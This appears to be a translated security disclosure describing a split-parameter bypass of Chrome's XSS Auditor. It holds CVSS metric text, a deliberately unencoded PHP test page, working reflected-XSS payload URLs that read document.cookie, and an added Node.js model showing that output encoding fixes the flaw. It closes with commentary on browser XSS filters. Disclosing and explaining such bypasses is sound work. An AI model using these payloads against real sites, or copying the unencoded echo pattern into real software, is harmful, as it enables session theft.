Attack Vector (AV): Network
The vulnerable system is bound to the network stack, and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack that is exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).

Attack Complexity (AC): Low
There are no special conditions the attacker must meet and no target-specific circumvention is required to exploit the vulnerability; an attacker can expect repeatable success against the vulnerable system.

Privileges Required (PR): High
The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system, allowing full access to the vulnerable system’s settings and files.

Scope (S): Changed
An exploited vulnerability can affect resources beyond the security scope managed by the security authority of the vulnerable component. This is often referred to as “privilege escalation”, where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.

Confidentiality (C): Low
There is some impact on confidentiality, but the attacker either does not have control over what data is obtained, or the information obtained does not have a significant impact on the system or its operations.

Integrity (I): None
There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.

Availability (A): None
There is no impact on the availability of the system; the attacker cannot disrupt access to or use of the system.
Summary
----------
A flaw in Google Chrome's built-in anti-XSS filter (the XSS Auditor) allows an attacker to carry out XSS attacks that the filter is supposed to block.
Details
---------
A few days ago I found a way to bypass the protection against XSS attacks in the current latest version of Google Chrome, and I have left a temporary proof of concept here:
http://ec2-50-16-152-72.compute-1.amazonaws.com/chrome-filterxss-bypass.php
test.php (both parameters are echoed unencoded on purpose; this is the vulnerable test page):
<p> var1: <?php echo $_GET['var1']; ?> </p>
<p> var2: <?php echo $_GET['var2']; ?> </p>
Filter Works: test.php?var1=<script>alert(document.cookie);/*&var2=*/</script>
Filter Bypass: test.php?var1=<script>alert(document.cookie);x='&var2=';</script>
The problem is that Chrome does not treat everything that follows <script> as the injected snippet: the auditor only cuts the script at a JavaScript comment, so an attacker can obfuscate the rest of the payload after the injection point, for example by opening a string literal in one parameter and closing it in another.
http://trac.webkit.org/browser/trunk/Source/WebCore/html/parser/XSSAuditor.cpp?rev=119184#L91
The auditor only handles comments inside the script tag (see the linked line of XSSAuditor.cpp).
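The split-payload bypass described above, modelled as an added example that is not part of the original post: a short Node.js script reflects var1 and var2 the way test.php does, then applies a simplified stand-in for the rule the post attributes to the XSS Auditor (cut the injected script body at the first JavaScript comment, and block when what remains appears verbatim in the request URL). That simplified auditor, the function names and the hardened page are assumptions made for illustration, not the logic in XSSAuditor.cpp. The hardened variant HTML-encodes the reflected values, which neutralises both payloads without relying on any browser-side filter.

```javascript
// Added example, not code from the original post. Models the two requests
// from the post against (a) a page that reflects parameters raw, like test.php,
// and (b) the same page with output encoding, and checks each against a
// simplified stand-in for Chrome's XSS Auditor. The auditor model is an
// assumption for illustration; it is not the real XSSAuditor.cpp logic.

// Minimal HTML entity encoding for text placed in an element body.
function htmlEscape(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#039;');
}

// (a) Vulnerable page: mirrors test.php, echoing both parameters unencoded.
function renderVulnerable(params) {
  return `<p> var1: ${params.get('var1')} </p>\n<p> var2: ${params.get('var2')} </p>`;
}

// (b) Fixed page: identical layout, every reflected value is HTML-encoded.
function renderFixed(params) {
  return `<p> var1: ${htmlEscape(params.get('var1'))} </p>\n<p> var2: ${htmlEscape(params.get('var2'))} </p>`;
}

// Simplified auditor (assumption): for each <script> element in the response,
// keep the body only up to the first "//" or "/*", then block the script when
// "<script>" followed by that snippet occurs in the decoded request URL.
// A payload that opens a string literal instead of a comment is never cut, so
// the snippet contains the HTML between the two reflections and cannot match.
function auditorBlocks(url, html) {
  const decodedUrl = decodeURIComponent(url);
  const scriptRe = /<script>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const body = m[1];
    const cut = body.search(/\/\/|\/\*/);
    const snippet = cut === -1 ? body : body.slice(0, cut);
    if (decodedUrl.includes('<script>' + snippet)) return true;
  }
  return false;
}

// True when the rendered page contains a <script> element that the auditor
// model lets through, i.e. when alert(document.cookie) would execute.
function scriptRuns(url, render) {
  const params = new URL(url, 'http://localhost').searchParams;
  const html = render(params);
  const hasScript = /<script>[\s\S]*?<\/script>/i.test(html);
  return hasScript && !auditorBlocks(url, html);
}

// The two requests from the post, constructed inline (no server involved).
const COMMENT_PAYLOAD = "/test.php?var1=<script>alert(document.cookie);/*&var2=*/</script>";
const STRING_PAYLOAD  = "/test.php?var1=<script>alert(document.cookie);x='&var2=';</script>";

for (const [label, url] of [['comment split', COMMENT_PAYLOAD], ['string split', STRING_PAYLOAD]]) {
  console.log(`${label}: runs on vulnerable page = ${scriptRuns(url, renderVulnerable)},` +
              ` runs on encoded page = ${scriptRuns(url, renderFixed)}`);
}
```

Run it with node: under the model, the comment-split request is blocked, the string-split request executes on the page that reflects raw input, and neither executes on the page that encodes its output, which is the fix that does not depend on the browser at all.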
To understand this a little better, we must first know that Google ships a filter intended to prevent an attacker from taking advantage of the user's browser, but ... how effective is it in practice?
Looking around on the Internet ( https://www.google.cl/search?q=bypass%20chrome%20xss%20filter) I realized that over time there have been many ways to circumvent this security system, and today is no exception. So does this added security system really serve the end user? The answer is NO, and Microsoft knows this very well too: since the release of Internet Explorer 8 they have tried to build similar filters to prevent such attacks, without positive results, and at every security conference held somewhere in the world someone always shows up with a new bypass for their filter.
But ... What is XSS? ...
Technically, an XSS attack is when a website prints back whatever you send it, so that malicious code can be injected which can, for example, steal user sessions. Even though this is purely the result of bad web development, some companies opt to try to prevent such situations directly through their products (browsers).
Was it reported?
I did report it, hoping to get something from the Google bounty program ( http://www.chromium.org/Home/chromium-security/vulnerability-rewards-program ), but I was told it was not covered xD. In fact they said there are some things that are filtered and some that are not:
https://code.google.com/p/chromium/issues/detail?id=171114
> #1 jsc...@chromium.org
>
> That is correct. The XSS auditor does not explicitly filter script
> injection split across multiple variables. At some point we plan on
> posting a document explaining what the XSS auditor can and cannot filter.
Is it 100% effective?
The answer is simple, and it is a resounding NO. It is like the case of viruses: the manufacturers themselves say they cannot guarantee that they detect more than 30% of all existing viruses. In the case of anti-XSS filters, likewise nobody can guarantee that you will never be hacked through an XSS; the filter comes built in, cannot be removed (or they do not want to let you remove it), and you will have to use it.
What are the risks of using anti-XSS filters?
Some companies like Microsoft have had huge problems by imposing these filters on users, because some attackers manage to turn the filter itself against those same users and can steal accounts on websites that have never had security problems, as in the universal XSS case in Internet Explorer ( http://blackhat.com/html/bh-eu-10/bh-eu-10-briefings.html#Lindsay ). There are also problems with standards and programming, since in some cases pages are sent to a section where parameters containing HTML content are passed, and the anti-XSS filters interrupt them, which goes against the HTTP protocol standard, because that is what URL encoding and proper web programming are for.
Mozilla is very clear
Today Mozilla Firefox does not use any anti-XSS filter. Why? Because they have it clear: using an anti-XSS filter only attracts more hackers and crackers trying to break those rules with as little effort as possible. Trying to impose filters is like trying to cover the sun with one finger. XSS flaws are not the fault of the browsers but of website developers; in fact, we often want to test or teach people how to protect their code against such situations, and that is only possible in Mozilla Firefox and other browsers that do not include such a filter.
Mozilla Firefox recommends the NoScript add-on ( https://wiki.mozilla.org/Security/Features/XSS_Filter ) for people who really want a filter, rather than one imposed on them. As always, worry about what we want and not about what we consume.
(powered by Google Translator).
Mirror
--------
http://whk.drawcoders.net/index.php/topic,2889.0.html